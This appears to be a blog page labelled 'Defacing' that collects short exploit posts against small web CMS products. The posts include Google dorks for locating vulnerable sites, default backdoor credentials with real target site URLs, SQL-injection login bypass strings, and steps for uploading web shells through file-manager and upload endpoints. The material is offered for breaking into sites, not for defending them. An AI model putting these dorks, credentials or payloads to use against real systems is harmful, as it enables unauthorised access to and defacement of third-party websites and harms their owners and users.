Showing posts with label Defacing. Show all posts
Showing posts with label Defacing. Show all posts

Aonestar CMS BackDoor Vulnerability

Add Comment
Title : Aonestar CMS BackDoor Vulnerability
Credit : MrHoudini
Date : 9-1-2018
Dork : intext:"D & D by Aonestar"
Username : admin
Password : admin

Sites :
http://infodevvideo.co.uk/admin/
http://beaconhousenursing.co.uk/admin/
http://anayatfoundation.org/aytadmin/

K-LOANS 1.4.5 Backdoor account Vulnerability

Add Comment
============================================================================ | # Title : K-LOANS 1.4.5 Backdoor account Vulnerability | |
# Author : indoushka | |
# email : indoushka4ever@gmail.com | |
# Tested on : windows 10 Français V.(Pro) | |
# Version : v 1.4.5 | |
# Vendor : https://codecanyon.net/item/loan-management-system/11454263| |
# Dork : K-LOANS 1.4.5 | ============================================================================ poc :
[+] Dorking İn Google Or Other Search Enggine
[+] user : admin & pass = admin123 http://www.garciuz.com/prestar/index.php/home

Website Sekolah Gratis - Responsive FileManager

Add Comment
 
# Exploit Title: Website Sekolah Gratis - Responsive FileManager
# Google Dork: intext:"Setup by Website Sekolah Gratis."
# Date: 28 December 2017 (Indonesia)
# Exploit Author: AlHikam0x
# Tested on: Ubuntu

Proof of Concept
1. Responsive FileManager https://web-target/include/filemanager/dialog.php
View Responsive FileManager : HERE
2. Upload Shell shell.php.fla and more.
3. Right click, Show URL https://web-target/files/shell.php.fla

Global Webmasters - Admin Panel Bypass

Add Comment
# Exploit Title: Global Webmasters - Admin Panel Bypass
# Google Dork: intext:" by GlobalWebmasters"
# Date: 30 December 2017
# Exploit Author: AlHikam0x
# Vendor Homepage: https://www.sajtovi-izrada.com
# Tested on: Ubuntu

Proof of Concept
1. Login Admin Panel. https://web-target/admin or login , etc.
2. Input username and password (bypassing)
Username: '=''or'
Password: '=''or'

I test it directly to the developer site, and the client site also has the same vulnerability.
Development is Vulnerability! https://www.sajtovi-izrada.com/

雅风工作室 - Arbitrary File Upload

Add Comment
# Exploit Title: 雅风工作室 - Arbitrary File Upload
# Google Dork: intext:"Htmcss.Com All Rights Reserved"
# Date: 30 December 2017
# Exploit Author: AlHikam0x
# Vendor Homepage: http://www.htmcss.com
# Tested on: Ubuntu

Proof of Concept
1. Check Vulnerability. https://web-target/tpl/plugins/upload9.1.0/server/php/
2. Array type Upload : files[]
3. Check file uploaded. https://web-target/tpl/plugins/upload9.1.0/server/php/files/1234567_.php